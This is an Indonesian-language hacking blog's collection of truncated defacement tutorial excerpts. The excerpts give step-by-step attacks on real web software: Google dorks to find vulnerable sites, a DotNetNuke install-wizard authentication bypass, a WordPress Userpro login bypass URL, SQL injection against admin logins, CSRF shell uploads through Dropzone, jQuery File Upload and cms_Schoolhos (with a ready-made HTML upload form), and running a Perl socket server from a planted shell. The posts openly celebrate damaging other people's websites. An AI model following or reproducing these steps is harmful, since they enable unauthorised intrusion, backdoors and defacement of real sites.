Alwdy

Peretasan Situs atau Hack Website di Indonesia sedang marak - maraknya dan beberapa dari kasus hack website terjadi pada situs - situs pemerintahan. Menurut pengakuan salah seorang hacker atau peretas, mereka meretas hanyalah dengan menggunakan Handphone Android. Ya memang benar pada saat ini Handphone Android memang memiliki banyak sekali fungsi dan hampir sama dengan Komputer, untuk itu hanya berbekal sebuah Handphone Android kita bisa meretas atau menghack sebuah website. Cara Hack Website Dengan Android (Termux) Ya kali ini saya akan memberi tutorial bagaimana Cara Hack Website Dengan Android , metode yang digunakan pada tutorial kali ini ialah WebDav. Metode ini memanglah metode lama yang kabarnya ditemukan oleh Hmei7, meskipun metode lama, masih banyak Website atau situs yang masih bisa diretas menggunakan metode Webdav ini. Sebelum ke tutorial silahkan kalian siapkan alat dan bahan berikut ini : Aplikasi Termux ( Download Disini ) Handphone Android Koneksi Internet Script Defac...

Cara memasang Script Bunga Sakura pada SC Deface (Javacscript) Hallo semuanya kembali lagi dengan saya disini, Admin Adewakun Kali ini saya akan memberikan sebuah tutorial Javascript Ada yang tau apa itu Javascript?? Javascript adalah bahasa pemograman tingkat tinggi dan dinamis. JavaScript populer di internet dan dapat bekerja di sebagian besar penjelajah web populer seperti Mozilla, Google dan lain lian Itulah Javascript menurut Wikipedia Balik lagi ke tutorial Kali ini saya kana memberikan Sebuah tutorial Cara memasang Script Bunga Sakura pada SC Deface (Javacscript) Langsun saja kita mulai 1. Buka di notepad script deface kalian masing masing (Ane sarankan gunakan aja notepad++ atau text browser yang lain) 2. Di bagian atas code <body> masukkan codingan <script src="Isi dengan link/code script bunga sakura"> kemudian di tutup juga dengan </script> Bunga sakura https://pastebin.com/raw/8v6kQfn5 Contoh <html> <head> <title>Hacked by Mr.Ad...

DotNetNuke - Administration Authentication Bypass Assalamualaikum Wr.Wb Baiklah bertemu lagi dengan saya Adewa (Mr.Adewa) Terimakasih telah berkunjung ke web sederhanan ini. Hehe Kali ini saya akan memberikan Tutorial Deface metode DotNetNuke - Administration Authentication Bypass Sebelum deface sebaiknya kita mempersiapkan alat dan bahan -Shel sendiri sendiri -Script deface (saya rasa udah punya sendiri sendiri) -Exploit number 39777  https://www.exploit-db.com/exploits/39777/ -Dork  Use Your Brain Langsung saja simak tutorialnya 1. Dorking site dulu di google 2. Jika sudah masukkan exploitnya menjadi seperti ini  site.co.li/Install/InstallWizard.aspx?__VIEWSTATE= 3. Jika ada register. Kalian register aja dengan benar 4. Jika sudah hapus  __VIEWSTATE= 5. Dan tambahkan culture=en-US&executeinstall pada bagian aspx menjadi seperti ini  site.co.li/Install/InstallWizard.aspx?culture=en-US&executeinstall 6.  Langkah terakhir tinggal login saja untuk log...

Holla pengunjung setia AllTutorCyber. Pasti kalian sering gagal dalam bypass extensi shell atau cms website hanya menerima format jpg saja. Dan sudah mencoba tamper data dari Mozilla Firefox tapi sudah tidak ada versi yang didukung lagi. Maka kali ini admin ingin memberikan tutorial cara tamper data menggunakan Burpsuite. Apa itu Burp Suite ? Burp atau Burp Suite adalah alat grafis untuk menguji keamanan aplikasi Web. Alat ini ditulis di Java dan dikembangkan oleh PortSwigger Web Security. Alat ini memiliki tiga edisi. Edisi Komunitas yang dapat diunduh secara gratis, Edisi Profesional, dan edisi Perusahaan yang dapat dibeli setelah periode uji coba. Edisi Komunitas telah secara signifikan mengurangi fungsionalitas. Ini dikembangkan untuk memberikan solusi komprehensif untuk pemeriksaan keamanan aplikasi web. Selain fungsi dasar, seperti server proxy, pemindai, dan penyusup, alat ini juga berisi opsi lanjutan lainnya seperti spider, repeater, decoder, pembanding, extender, dan sequence...

Tutorial Socket Server With Perl Assalamualaikum Wr.Wb Baiklah kembali lagi dengan saya Mr.Adewa Pada kali ini saya akan memberikan Tutorial Socket Server With Perl Sebelum itu kita harus mempersiapkan sesuatu -Script Socker Server  Di sini Coeg https://pastebin.com/raw/uaV1n44M -Shel yg udah tertanam pada sebuah site Langsung saja kita mulai 1. Sebelum memulai socket server Download dulu Script Socket Server tersebut dan edit sesuai nick kalian dan edit bagian local port ubah menjadi code socket kalian. Di sini saya mengubah menjadi 1337 dan save dengan format perl (.pl) seperti ini socket_server.pl 2. Check dulu di site tersebut dan lihat apakah perlnya on atau off  Jika off tidak bisa dan skip aja web tersebut 3. Upload script Socket Server terlebih dahulu 4. jika sudah upload langsung pergi ke command shel dan ketikkan perintah pertama yaitu perl nama socket kalian.pl karena saya tadi menamakannya socket_server.pl Maka perintahnya adalah perl socket_server.pl 5. Jika sudah...

Injeksi SQL Tanpa Tanda Kutip Tag :        - "SQL Injection Without Quotes"        - "Injeksi SQL Tanpa Tanda Kutip"        - "Bypass admin Tanpa Tanda Kutip" Kembali lagi bersama kami All Tutor Cyber, kali ini admin akan menulis postingan yang berjudul "SQLI Without Quotes". Nah.. sebelum masuk ketutorial kita membahas apa itu SQLI Without Quotes? SQLI Without Quotes adalah Injeksi yang dilakukan kedalam website tanpa menggunakan tanda kutip. Injeksi ini bisa kita gunakan untuk masuk ke dalam dashboard admin website melaluli login page admin. Lebih jelasnya baca di https://eternalnoobs.com/sqli-without-quotes/ Langsung saja ke Tutorialnya : 1. Dork yang saya gunakan : "Powered by SHODH TECHNOLOGIES" untuk mendapatkan live target. Gunakan dork diatas pada search engine, lalu pilih salah satu website. 2. Jika sudah mendapatkan website target masuk ke dalam halaman login admin. Biasanya page adminnya ada di /admin/ atau /we...

Deface Metode Dropzone CSRF Baiklah kembali lagi bersama saya Mr.Adewa Kali ini saya admin sendiri akan memberikan tutorial merusak "Gak capek lu merusak mulu" "Cari pacar sana, biar gak merusak lagi" Tutorial Deface Metode Dropzone CSRF Langsung saja kita mulai Siapkan dulu alat di bawah ini -Dork inur:/dropzone/upload site: bla bla -Exploit [Patch]/dropzone/upload.php -Akses shel [Patch]/dropzone/uploads/namashel .php Waktunya kita mulai tutorialnya 1. Dorking dulu di google (Kembangkan dork biar dapat yg vuln 2. Jika sudah masukkan exploit Contoh site.com/[patch]/dropzone/upload.php Jika vuln akan ada blank/putih seperti di bawah ini 3. Buka csrf online kalian 4. Pada bagian Url masukkan target beserta exploitnya Bagian post isi dengan file atau File 5. Jika sudah kunci target dan akan keluar tempat upload. Upload shel kalian 6. Jika blank berarti shel kalian sudah terupload Untuk akses shel [Patch]/dropzone/uploads/namashel .php Gunakanlah ilmu kalian dengan bai...

CSRF cms_Schoolhos Oke baiklah bersama kami All Tutor Cyber. Kali ini saya sebagai admin akan membahas tutorial Deface Mengenai CSRF cms_Schoolhos. Langsung saja kita mulai Tutorialnya Upss.., sebelum itu kita siapkan alat tempurnya, apa saja alat tempurnya ?! - Shell Backdoor ( Saya rasa udah punya sendiri sendiri ) - Script Deface ( Saya rasa udah punya sendiri sendiri ) - Dork :              inurl:/?p=berita ( Kembangkan dorknya ) -CSRF :   <html>   <head>   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">   <title>Tatsumi Crew</title>   </head>   <body>   <form method="POST" action=" site.com /elearningku/proses.php?pilih=guru&untukdi=upload" enctype="multipart/form-data" name="tambahmapel" id="tambahmapel">   <input type="file" name="fupload">   <input type="submit" class="tombol" value="U...

WordPress Plugin Userpro - Authentication Bypass Baiklah kembali lagi dengan admin gans satu ini, kali ini saya akan memberikan tutorial Deface WordPress Plugin Userpro - Authentication Bypass Langsung saja kita mulai Tutorialnya Sebelum itu siapkan dulu : - Shell atau Backdoor kalian - Script Deface - Dork : inurl:/plugins/userpto -Exploit : /?up_auto_log=true  Saya rasa kalian sudah punya kedua alat tempur tersebut. 1. Dorking di google : inurl:/plugins/userpto 2. Jika sudah masukkan exploitnya seperti ini /?up_auto_log=true Contoh : site.com /?up_auto_log=true 3. Jika sukses akan ada login atau masuk ke dalam wordpress tersebut 4. Selanjutnya sesuka kalian aja, mau kalian upload shell atau tidak itu bukan urusan saya Nahh.., mudah bukan tutorial WordPress Plugin Userpro - Authentication Bypass ini. Sekianlah Postingan Dari All Tutor Cyber tentang "WordPress Plugin Userpro - Authentication Bypass" Semoga Bisa Bermanfaat! Anda Sekarang Sedang Membaca Postingan "Word...

Deface metode Jquery File Upload Baiklah kembali lagi dengan saya Adewa Pada tutorial kali ini saya sendiri akan menshare "Deface metode Jquery File Upload" langsung aja kita mulai Dork index/server/php "Jquery" site: Exploit server/php Csrf Online [ Touch Me ] http://bali.co.nz/csrf.php 1. Dorking dulu di google, jika menemukan web tambahkan server/php 2. Jika menemukan seperti ini berarti sitenya vuln jquery 3. Langsung saja buka CSRF onlinenya 4. Masukkan targetnya beserta exploit seperti ini site.co.li/server/php pada bagian post isi aja files[] 5. Kunci target kalian dan upload shellnya 5. Akses shell tambahkan files pada website Contoh site.co.li/server/php/files/nama shel.php Selamat anda telah berhasil merusak website seseorang, Sekian dan terimakasih